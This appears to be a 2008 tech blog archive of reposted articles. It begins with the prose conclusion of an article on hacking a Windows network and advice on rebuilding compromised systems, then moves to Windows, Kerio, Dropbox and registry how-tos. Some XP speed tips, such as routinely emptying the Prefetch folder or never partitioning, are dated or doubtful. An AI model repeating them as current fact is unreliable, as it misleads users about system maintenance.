This network has now been thoroughly hacked. I could go on and do whatever I came for, but from here on, it is mostly up to what the attacker wants to do. Potential options would be to scavenge the network for data, steal confidential information, add himself to the payroll, use the network to attack some other network such as a business partner, and so on. The attacker has complete and unrestricted access to the entire contoso.com network.

Conclusion

In this article, I've examined how a Windows-based network might be hacked. I hasten to point out that Windows-based networks are no less secure than any other network. While the specific attacks used in this article are unique to Windows, minor modifications to the techniques and a new tool set would make the same compromise possible on a network running a different platform. The problem is not the platform itself, but the practices. All platforms are securable, but all networks are exploitable if they are not architected and implemented carefully. Poor implementation is always poor implementation, regardless of the underlying platform.

How to Get a Hacker Out of Your Network

Once a network has been thoroughly hacked, the system administrator has three options: update their resume, hope the hacker does a good job running the network, or drain the network. You will of course need to take action to deal with the attack. Let's first take a look at some of the available options and assumptions and consider why they might not be the best course of action when cleaning a hacked system.

You cannot clean a compromised system by patching it; patching only removes the vulnerability. Once an attacker gets into your system, you should assume that he or she has ensured there are several other ways to get back in.

You cannot clean a compromised system by removing the backdoors. You can never guarantee that you found all the backdoors the attacker put in. The fact that you cannot find any more may only mean you do not know where to look, or that the system is so compromised that what you are seeing is not actually what is there.

You cannot clean a compromised system by using some "vulnerability remover." Let's say your system was hit by Blaster. A number of vendors (including Microsoft) published vulnerability removers for Blaster. Can you trust a system that had Blaster after the tool is run? I wouldn't. If the system was vulnerable to Blaster, it was also vulnerable to a number of other attacks. Can you guarantee that none of those have been run against it? I didn't think so.

You cannot clean a compromised system by using a virus scanner. A fully compromised system cannot be trusted to tell you the truth. Even virus scanners must at some level rely on the system to not lie to them. If they ask whether a particular file is present, the attacker may simply have a tool in place that lies about it. If you can guarantee that the only thing that compromised the system was a particular virus or worm and you know that this virus has no backdoors associated with it, and the vulnerability used by the virus was not available remotely, then a virus scanner can be used to clean the system. For example, the vast majority of e-mail worms rely on a user opening an attachment. In this particular case, it is possible that the only infection on the system is the one that came from the attachment containing the worm. However, if the vulnerability exploited by the worm was accessible remotely without user action and you cannot guarantee that the worm was the only thing that exploited that vulnerability, it is entirely possible that something else used the same vulnerability. In this case, you cannot just patch the system.

You cannot clean a compromised system by reinstalling the operating system over the existing installation. Again, the attacker may very well have tools in place that can lie to the installer. If that happens, the installer may not actually remove the compromised files. In addition, the attacker may also have put backdoors in non-operating-system components.

You cannot trust any data copied from a compromised system. Once an attacker gets into a system, all the data on it may be modified. Copying data from a compromised system and putting it on a clean system will in the best case scenario give you potentially untrustworthy data. In the worst case, you may actually have copied a backdoor hidden in the data.

You cannot trust the event logs on a compromised system. Once an attacker gets full access to a system, it is simple to modify the event logs on that system to cover his tracks. If you rely on the event logs to tell you what the attacker has done to your system, you may just be reading what they want you to read.

You may not be able to trust your latest backup. How can you tell when the original attack took place? The event logs cannot be trusted to tell you. Without that knowledge, your latest backup is completely useless. It may be a backup that includes all the backdoors currently on the system. For that matter, how can you trust any backup?

The only proper way to clean a compromised system is to flatten and rebuild it. If you have a system that has been completely compromised, the only safe thing you can do is to flatten the system (wipe it clean) and rebuild it from scratch.

If you consider the alternative, it seems highly worthwhile to prevent the system from getting hacked in the first place, doesn't it? For more information on what to do after you've been hacked, see "The Day After: Your First Response To A Security Breach" by Kelly J. Cooper in this issue of TechNet Magazine.

kerio tricks

2008-07-02T05:06:00.000-07:00

How to Avoid Sending Away Messages to a Mailing List

When your out of the office reply is enabled, you might unintentionally send your out of office notification to every member in a mailing list that you are a part of. To avoid this, simply
- make sure the default out of office message is off or disabled,
- then create the following two new mail filtering rules: a new Out of office rule and an out of office exclusion rule.

In Kerio WebMail
1. Go to Settings -> Mail Filters.
2. Click New to create new rules.

(New Out of office rule)
1. For rule conditions, select "For all messages".
2. For rule actions, select "Send autoreply".
3. In the rule description, click on "Reply text:" and enter your custom message.
4. Name the rule and click OK.
5. Use the Move up button to move this rule to the top of your list of mail filters.

(Out of office exclusion rule)
1. For rule conditions, select "Where the From address contains".
2. In the rule description, click on "contains" and enter the email addresses that you do not wish to send an Out of office reply to.
3. For rule actions, select "Keep in INBOX" and "Stop processing more rules".
4. Name the rule and click OK.
5. Use the Move up button to move this rule above the new Out of office rule you just created.

In the offline edition of Kerio Outlook Connector
1. Go to Tools > Options > Kerio MailServer tab.
2. Click on the Filtering Rules... button.
3. Click New to create new rules.
4. Create the two new rules above.
5. Use the Move up button to move the rules to the appropriate locations.

Do you have a tip or trick that you would like to share? Send it to sharetipntrick@kerio.com.

dropbox change folder

2008-06-27T05:26:00.001-07:00

hi kishore,

we'll be adding a way to do this; in the meantime, if you're feeling adventurous and know your way around the registry (i assume you're on windows), you can do the following:

1) close Dropbox
2) go to

HKEY_CURRENT_USER\Evenflow Software\Dropbox

and change "DropboxPath" to your desired location

3) (optionally) move your existing Dropbox folder to that new path
4) restart Dropbox, and it will either immediately be in sync, or if you didn't move your Dropbox folder, it will let you re-link your account and will download all your files.

if you prefer, you can also just sit tight and we'll add a simpler way to do this in the next month or two.

Posted 4 months ago #

make folders easy

2008-06-26T17:46:00.001-07:00

By Scott Dunn

Simplify file management by generating new folders from your right-click menu that automatically have the current date in the folder name.

Run a four-line batch file from your context menu that creates whole hierarchies of folders that you name from the Command Prompt.

Name folders based on their creation date

It's often useful to sort files into folders based on when the files were created. This is especially handy for storing digital photos. Of course, you can simply create a folder and name it manually. But it's much faster to add the date to the folder name automatically.

Date-based folders are more useful if their names are automatically sorted in chronological order. They won't sort chronologically if you use a date format such as "June 30, 2008."

But you can sort folders by date if you use the year-month-day format (for example, "2008-06-30"). This way, your folders will be listed in date order automatically when you sort them by name.

Start by choosing Windows' short-date format:

Step 1. Press the Windows key (Win) plus the letter R to open the Run dialog box. Type control intl.cpl and press Enter.

Step 2. In the Regional and Language Options Control Panel, click Customize (in XP) or Customize this format (in Vista).

Step 3. In the Customize Regional Options dialog box, click the Date tab.

Step 4. For Short date, choose yyyy-MM-dd from the drop-down list. Click OK twice.

Now add a command to your folders' context (or right-click) menu that names new folders based on this format.

In Windows XP, this can be done via Windows Explorer dialog boxes. Unfortunately, doing so triggers a Windows bug that can be fixed only by editing the Registry.

In Vista, you have to edit the Registry from the start, so it's best to use the Registry Editor to make the change in both Vista and XP.

Careless Registry changes can cause Windows to misbehave, so create a restore point before you begin. That way you can revert to the pre-modification Registry in case something goes wrong.

In XP, follow these steps to create a restore point:

Step 1. Choose Start, All Programs, Accessories, System Tools, System Restore.

Step 2. Select Create a restore point, click Next, and follow the instructions in the wizard to complete the process.

Follow these steps to create a restore point in Vista:

Step 1. Click Start, type SystemPropertiesProtection, and press Enter. Click Continue if prompted by User Account Control (UAC).

Step 2. Click Create. Type a name for your restore point, and press Enter. Click OK to acknowledge the completion of the process and OK again to close System Properties.

Now you're ready to add a new command to Explorer's context menu for folders:

Step 1. Press Win+R to open the Run dialog box. Type regedit and press Enter.

Step 2. In the tree pane on the left, navigate to and select:

HKEY_CLASSES_ROOT\Directory\shell

Step 3. (Optional) The next tip I describe entails returning to this location, so you may want to choose Favorites, then Add to Favorites; type a descriptive name; and press Enter to facilitate reopening the key.

Step 4. In the tree pane, right-click the shell icon and choose New, Key. Type a name, such as Date_Folder, and press Enter.

Step 5. With Date_Folder (or whatever you named the key) selected in the tree pane, double-click the (Default) icon in the right pane.

Step 6. In the Value Data box, type the command as you want it to appear on your context menu. For example, you might type "New folder with today's date" (without the quotation marks). Click OK.

Step 7. Right-click the Date_Folder key in the tree pane and choose New, Key. Name it command and press Enter.

Step 8. With the command icon selected in the tree pane, double-click the (Default) icon in the right pane.

Step 9. In the Value data box, type:

cmd.exe /c md "%1\%%DATE%%"

(including the quotation marks) and click OK. Exit the Registry Editor.

Now when you right-click a folder icon in Explorer or on the desktop, you'll see your new command. When you choose it, a Command Prompt window may briefly flash on screen.

The command creates a new folder inside the selected one, so you may find it easier to use on folders in the tree pane. If you don't see the new folder, press F5 to refresh the Explorer window.

Once the folder contains a folder named for the current date, the command can't create another folder with the same name. So once you invoke it, subsequent use of this command on the same folder will have no effect until the next day.

Mass-produce new folders via a batch file

By default, the only ways to create a folder in Explorer are to click File, New, Folder or to right-click in the right pane and choose New, Folder. If you need to make more than a few new folders at one time, this gets old very quickly.

Save time and trouble by adding a command to your folder context menu that lets you create all the new folders you wish — including a hierarchy of subfolders — almost as fast as you can type.

Start by creating a batch file that will generate new subfolders within any folder you right-click:

Step 1. Press Win+R to open the Run dialog box. Type notepad and press Enter.

Step 2. In Notepad, type the following four lines exactly:

@echo off
set /p name="Type one or more folder names: "
cd %1
md %name%

The first line hides the code from the Command Prompt window.

The second line prompts you to enter the folder names and then stores the names in a variable called Name.

Be sure to place one or more spaces before the closing quotation mark in line 2. That way, the names you type won't run up against the prompt in the Command Prompt window.

The other commands in the batch file switch the current folder to the one you right-clicked and create folders based on what you type at the prompt.

Step 3. Save the file to a location of your choice, for example C:\batch. Name the file something like manyfolders.cmd and then exit Notepad.

Next, add a command to launch the batch file from your folders' context menu. As in the context-menu customization I described above, this change requires some Registry editing:

Step 1. Set a restore point as explained above.

Step 2. Press Win+R to open the Run dialog box. Type regedit and press Enter.

Step 3. In the tree pane on the left, navigate to and select:

HKEY_CLASSES_ROOT\Directory\shell

(If you saved this key to your Favorites menu as part of the tip above, choose the entry there to open the key in a flash.)

Step 4. In the tree pane, right-click the shell icon and choose New, Key. Type a name such as Make_Folders and press Enter.

Step 5. With Make_Folders (or whatever you named it) selected in the tree pane, double-click the (Default) icon in the right pane.

Step 6. In the Value Data box, type the command as you want it to appear on your context menu. For example, you might type Make one or more folders. Click OK.

Step 7. Right-click the Make_Folders key in the tree pane and choose New, Key. Name the new key command and press Enter.

Step 8. With the command icon selected in the tree pane, double-click the (Default) icon in the right pane.

Step 9. In the Value data box, type:

"c:\batch\manyfolders.cmd" "%1"

(with the quotation marks) and click OK. Naturally, your path and batch file name may differ. Exit the Registry Editor.

Now when you want to make one or several new folders within another folder, right-click that folder and choose your new command. A Command Prompt window appears telling you to type the name(s) of your folder(s). Type the name of each folder you want to create at that location, separated by a space.

If you want a folder name to include spaces, put that name within quotation marks. To create folders within folders, use the \ symbol. When you're done, press Enter.

For example, if you type:

Mon Tue Wed Thu Fri

you create those five folders within the current folder. Typing:

Mon\draft Mon\final Tue\draft Tue\final Wed\draft Wed\final Thu\draft Thu\final Fri\draft Fri\final

creates five folders, each of which has two subfolders named "draft" and "final."

If you don't see your new folders, press F5 to refresh Explorer.

Note that you can use this command to create a single folder as well.

Bonus tip: Looking for a fast way to add a single subfolder without taking your hands off the keyboard? Select the parent folder in Explorer, press Alt+F, Enter, Enter. Type the new name and press Enter again.

Note that this technique doesn't work if you have an object selected in the right pane. To fix that, press Ctrl+Spacebar to deselect it before using the aforementioned key sequence.

Troubleshoot a balky folder-creation shortcut

If your new folder-generating commands don't work as expected, double-check your settings in the Regional and Language Options Control Panel and the text in your manyfolders.cmd batch file.

You may also need to reopen the Registry Editor and double-check the names and values of the keys you just added. Double-click the (Default) icon of any key whose commands you need to edit, make the required changes, and click OK.

If the batch file still refuses to run and you decide to remove the commands from the context menu, navigate to and select:

HKEY_CLASSES_ROOT\Directory\shell

in the Registry Editor, right-click the Date_Folder or Many_Folders key in the Registry Editor's tree pane, and choose Delete. Click Yes to confirm.

If the file causes other problems, choose Start, All Programs, Accessories, System Tools, System Restore. Select the restore point you created before starting the process to return your computer to its previous state.

faster pop download sbs exchange

2008-06-20T18:31:00.001-07:00

It is easily changed (see below). Only trap is if you make it too short there can be problems with the POP3 connector starting a download before the previous download has started. I have a few sites set to 5 minute intervals and it seems ok

1. Locate and then click the following registry subkey:
"HKEY_LOCAL_MACHINE/SOFTWARE/Micro soft/SmallBusinessServer/Network/P OP3 Connector"

2. On the "Edit" menu, point to "New", and then click "DWORD Value".

3. Type "ScheduleAccelerator" (without the quotation marks) as the entry name, and then press ENTER.

5. On the "Edit" menu, click "Modify".

6. In the "Value data" box, type the value that you want, and then click "OK". To determine the polling interval, the value that is configured on the "Scheduling" tab in the GUI is divided by the value that you type for the ScheduleAccelerator entry.

For example, if a 15 minute interval is specified in the GUI and you set the value of the ScheduleAccelerator entry to 3, the connector will poll ever five minutes.

7. Quit Registry Editor

file splitting

2008-06-19T06:02:00.001-07:00

More ways to get files from Point A to Point B

After reading Becky Waring's Best Software column from the June 5, 2008, issue, several people wrote in to tell us about their favorite techniques for handling huge file transfers. Among them was Philip Daniels, who uses the $29 WinRAR program from Alexander Roshal and RARLAB:

§ "Why does a media file have to be moved in one chunk? We've been moving large files around the 'net for decades using multi-volume RARs (infamously, I once did this with CICS when the IBM network was being recalcitrant). WinRAR is probably the simplest means of creating such things; most unzippers, WinZip, 7Zip, etc., can reassemble the original file from a multiple-volume RAR.

"All one does is upload the RARs to one of the many free file-sharing services with the level of protection required (encryption, passwords, etc.)

"Typically, the providers delete the files once they know the receiver has successfully downloaded them."

Freeware cuts big file transfers down to size

As reader Gary Vellenzer points out, there's a free way to make quick work of massive file transfers.

§ "I'm sure that your new contributor, Becky Waring, is familiar with QuickPar (parity file generator/file splitter on the send side, parity checker and corrector/file joiner on the receive side). It's free and very easy to use. It is useful not just for file transfer. I generate PAR 2 files every time I write a DVD, so that a single point of failure doesn't render the DVD useless.

"When you use QuickPar, the file size limits for individual files are irrelevant, as is the time needed to upload the entire file in one piece, because the file can be uploaded in segments. The benefits are obvious — a failure of the transfer affects only one piece, so that you have to redo only that piece. It's also comforting to be able to check that you got the entire file contents exactly as intended.

"Since QuickPar makes the max file size irrelevant, it's worth looking at the major file-storage systems. People who actively share files use Swoopshare, RapidShare, Megaupload, and GigaSize. They generally don't use any of the services you mention. I've never run across any use of AOL's file share system — it's probably crippled by restricting its use to AOLers."

A free, open-source Web file-transfer service

Yet another file-transfer alternative is the free HTTP File Server (HFS) utility from Massimo Melina. Reader Bruce Schau describes the program:

§ "HFS allows you to easily share files between friends and family using your normal browser (usually, Internet Explorer or Firefox). HFS is so small that it fits on a floppy disk and can even run from your USB!

"Best of all, it's free and free of adware, spyware, and trojans. It works well and has many control options.

"Check it out!"

In this week's Best Software column, Becky takes a look at four services that let you send and receive faxes via your PC and browser, no hardware (or paper) required.

explorer add-ons

2008-06-14T07:15:00.001-07:00

Free add-ons teach Windows Explorer new tricks

By Scott Dunn

You can choose from dozens of file managers to replace Windows Explorer — some of them are even free — but only the original is so closely integrated into the OS.

Before you give Explorer the boot, check out some first-rate add-ons that turn Windows' tired file browser into the information manager of the future.

It's time to go beyond files and folders

You can find plenty of good replacements for Windows Explorer online. For example, in his Sept. 20, 2007, column, Woody Leonhard recently recommended Xplorer². But few match the convenience of having a file manager that is built into the operating system.

Rather than trying to find your ideal file manager at the downloads store, I suggest you mend it, not end it. You can give Windows Explorer most of the tools and abilities found in the video preview simply by installing a handful of free or low-cost Explorer extensions.

Give Explorer more file-management muscle

Here are some of my favorite tools for souping up the Explorer you already have.

Give your dialog boxes more reach. The one freeware utility I recommend over all others is FileBox eXtender. Not only does the program enhance Explorer, it also improves common Open and Save As dialog boxes and other interface elements.

FileBox eXtender's pop-up menu lists the last several folder locations you opened. You can also view a list of your favorite files or folders and resize dialog boxes so they always open at your preferred dimensions.

In addition to file management chores, FileBox eXtender adds a stay-on-top button to every window's title bar, as well as a button to "roll up" the window — just like a real window shade — until only its title bar is visible.

Add breadcrumbs to XP's folder paths. If you're using Windows XP, you may need a few add-ons to update that OS's version of Explorer to match Vista's file manager.

An example is Vista's "breadcrumb" style of displaying folder paths. Click any folder name in the path to navigate back to that folder instantly. Click one of the arrows separating folder names to see a pop-up menu of subfolders to navigate the other direction.

Explorer Breadcrumbs from Minimalist lets you add an Explorer toolbar with this same feature to Windows XP, 2003, or 2000.

In Vista, breadcrumbs replace the previous path notation in the address bar (click to the right of the path to see and select the old style). But since Explorer Breadcrumbs simply adds a new toolbar, you can keep both path styles visible in your Explorer windows at once, if you wish.

The program won't nag you, but the developers ask that you register the product for U.S. $8 if you decide to hold onto it.

Keep tabs on your open windows. If your screen is cluttered with Explorer windows, consider replacing them with tabs similar to those in Internet Explorer 7. Giving your windows tabs would let you switch from one folder location to another with a single click or by pressing Ctrl, Tab.

That's the idea behind QTTabBar. It took me a while to figure out how to use the program to create a new tab. (One way is to right-click a tab and choose "Clone this.") Once you get the hang of the tab-creation process, however, the program becomes very handy.

In addition to the tab toolbar, you can show or hide a toolbar for managing the tabs themselves. Since all of that toolbar's features are also found on the context menu for the tabs, you can save space by turning that option off and right-clicking the tabs instead.

QTTabBar also pops up a menu of objects in a folder when you click the tab's icon. The program's Options dialog includes plenty of customization choices.

You can download QTTabBar for free at the moment, but the program's status as freeware is not well documented.

Make new folders faster. Creating a new folder for organizing your data is one of the most common file management chores — so common that Windows has a button for it in common file dialog boxes like Open and Save As. But Explorer makes you dig into a submenu on the context menu or File menu for this common task.

For a quick and easy solution, download and install bxNewFolder. This simple utility adds a New Folder button to Explorer's existing Standard Buttons toolbar, so there's no new toolbar to take up space. Just click it (or press F12) and type a name to create a new folder in the current location.

The Create New Folder dialog box also includes a history of recently used folder names. Press Enter to finish up, or Shift+Enter to finish and open the new folder with one fell swoop.

Maximize your viewing and connectivity options

Add a third folder window to Explorer. I haven't yet found a tool that gives Windows Explorer side-by-side or stacked folder views in a single window. But FolderBox from BAxBEx Software comes close.

FolderBox lets you open a pane in an Explorer or folder window by clicking View, Explorer Bar, FolderBox. This pane, or FolderBox, works like an added folder window within Explorer.

Your new folder window comes with some handy navigation controls as well as buttons for bookmarking up to five of your favorite folder locations. Of course, you can drag and drop files between FolderBox and other parts of the Explorer window for convenient copying and moving. Best of all, the program is free!

Convert your FTP servers into folders. Explorer has My Computer (or Computer in Vista) for accessing your local drives directly and My Network Places (which Vista calls Network) for opening network locations. Wouldn't it be nice to access FTP locations in Explorer just as easily?

That's the idea behind My FTP Places. The program adds an eponymous icon to My Computer, after which any FTP locations you set up appear nested underneath this icon. This lets you copy files to, remove files from, and otherwise manage your FTP sites as if they were folders on your computer.

Unfortunately, integrating FTP with Explorer comes at a price. My FTP Places is free for your first 50 connections, but after that you need to pay a $40 registration fee.

If you don't mind doing your FTP chores from a separate program, there are plenty of free alternatives. One of the most favorably reviewed is the open-source FileZilla.

Size up your folders in a jiffy. The best free Explorer plugin for viewing folder sizes is, appropriately enough, Folder Size. This freebie adds columns to Explorer's Details view that total up the size of each folder in the list.

Folder Size also shows columns that display the number of files and the number of objects (files plus folders) in the selected folder. Although the scans the program performs to collect the size information can take time, the utility's overall performance on my sort-of-new XP machine was good. (Folder Size does not run on Vista systems.)

If you need a more detailed and graphical way of tracking down your disk hogs and don't care about integrating the information into Explorer, TreeSize Free is a no-cost, standalone tool that ferrets out the space hogs on your system.

Of course, there's plenty you can do to tweak your file and folder settings in Explorer itself. In a future column, I'll describe how to add features and customizations to Windows Explorer without having to download or install any add-ons at all.

23 ways to speed up XP

2008-06-07T14:08:00.001-07:00

Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.

1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.

Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

microsoft memory limitations

2008-06-03T11:40:00.000-07:00

RAM, Virtual Memory, Pagefile and all that stuff

View products that this article applies to.

Author: Bruce Sanderson MVP

Community Solutions Content Disclaimer

Article ID	:	555223
Last Review	:	December 12, 2004
Revision	:	1.0

SUMMARY

Basic information about the Virtual Memory implementation in 32 bit versions of Windows 2000, XP, 2003 Server etc.

MORE INFORMATION

In modern operating systems, including Windows, application programs and many system processes always reference memory using virtual memory addresses which are automatically translated to real (RAM) addresses by the hardware. Only core parts of the operating system kernel bypass this address translation and use real memory addresses directly.

Virtual Memory is always in use, even when the memory required by all running processes does not exceed the amount of RAM installed on the system.

An expanded version of this article is available at http://members.shaw.ca/bsanders/WindowsGeneralWeb/RAMVirtualMemoryPageFileEtc.htm.

Processes and Address Spaces

All processes (e.g. application executables) running under 32 bit Windows gets virtual memory addresses (a Virtual Address Space) going from 0 to 4,294,967,295 (2*32-1 = 4 GB), no matter how much RAM is actually installed on the computer.

In the default Windows OS configuration, 2 GB of this virtual address space are designated for each process’ private use and the other 2 GB are shared between all processes and the operating system. Normally, applications (e.g. Notepad, Word, Excel, Acrobat Reader) use only a small fraction of the 2GB of private address space.  The operating system only assigns RAM page frames to virtual memory pages that are in use.

Physical Address Extension (PAE) is the feature of the Intel 32 bit architecture that expands the physical memory (RAM) address to 36 bits (see KB articles 268363 and 261988). PAE does not change the size of the virtual address space, which remains at 4 GB, just the amount of actual RAM that can be addressed by the processor.

The translation between the 32 bit virtual memory address used by the code running in a process and the 36 bit RAM address is handled automatically and transparently by the computer hardware according to translation tables maintained by the operating system. Any virtual memory page (32 bit address) can be associated with any physical RAM page (36 bit address).

Here's a list of how much RAM the various Windows versions and editions support (as of Nov 2004):

     Windows NT 4.0: 4 GB
     Windows 2000 Professional: 4 GB
     Windows 2000 Standard Server: 4 GB
     Windows 2000 Advanced Server: 8GB
     Windows 2000 Datacenter Server: 32GB
     Windows XP Professional: 4 GB
     Windows Server 2003 Web Edition: 2 GB
   Windows Server 2003 Standard Edition: 4 GB
     Windows Server 2003 Enterprise Edition: 32 GB
     Windows Server 2003 Datacenter Edition: 64 GB

Pagefile

RAM is a limited resource, whereas virtual memory is, for most practical purposes, unlimited. There can be a large number of processes each with its own 2 GB of private virtual address space. When the memory in use by all the existing processes exceeds the amount of RAM available, the operating system will move pages (4 KB pieces) of one or more virtual address spaces to the computer’s hard disk, thus freeing that RAM frame for other uses. In Windows systems, these “paged out” pages are stored in one or more files called pagefile.sys in the root of a partition. There can be one such file in each disk partition. The location and size of the page file is configured in SystemProperties, Advanced, Performance (click the Settings button).

A frequently asked question is how big should I make the pagefile? There is no single answer to this question, because it depends on the amount of installed RAM and how much virtual memory that workload requires. If there is no other information available, the normal recommendation of 1.5 times the amount of RAM in the computer is a good place to start. On server systems, a common objective is to have enough RAM so that there is never a shortage and the pagefile is essentially, not used. On these systems, having a really large pagefile may serve no useful purpose. On the other hand, disk space is usually plentiful, so having a large pagefile (e.g. 1.5 times the installed RAM) does not cause a problem and eliminates the need to fuss over how large to make it.

Performance, Architectural Limits and RAM

On any computer system, as load (number of users, amount of work being done) increases, performance (how long it takes to do each task) will decrease, but in a non linear fashion.  Any increase in load (demand) beyond a certain point will result in a dramatic decrease in performance. This means that some resource is in critically short supply and has become a bottleneck.

At some point, the resource in critical short supply can not be increased. This means an architectural limit has been reached. Some commonly reported architectural limits in Windows include:

1. 2 GB of shared virtual address space for the system
2. 2 GB of private virtual address space per process
3. 660 MB System PTE storage
4. 470 MB paged pool storage
5. 256 MB nonpaged pool storage

The above applies to Windows 2003 Server specifically (from Knowledgebase article 294418), but also apply to Windows XP and Windows 2000.

Commonly found and quoted statements such as:

   with a Terminal Server, the 2 GB of shared address space will be completely used before 4 GB of RAM is used

may be true in some situations, but you need to monitor your system to know whether they apply to your particular system or not. In some cases, these statements are conclusions from specific Windows NT 4.0 or Windows 2000 environments and don't necessarily apply to Windows Server 2003. Significant changes were made to Windows Server 2003 to reduce the likelihood that these architectural limits will in fact be reached in practice. For example, some processes that were in the kernel have been moved to non kernel processes to reduce the amount of memory used in the shared virtual address space.

Monitoring RAM and Virtual Memory usage

Performance Monitor (Start, Administrative Tools, Performance) is the principle tool for monitoring system performance and identifying what the bottleneck really is.  Here's a summary of some important counters and what they tell you.

Memory, Committed Bytes - this is a measure of the demand for virtual memory
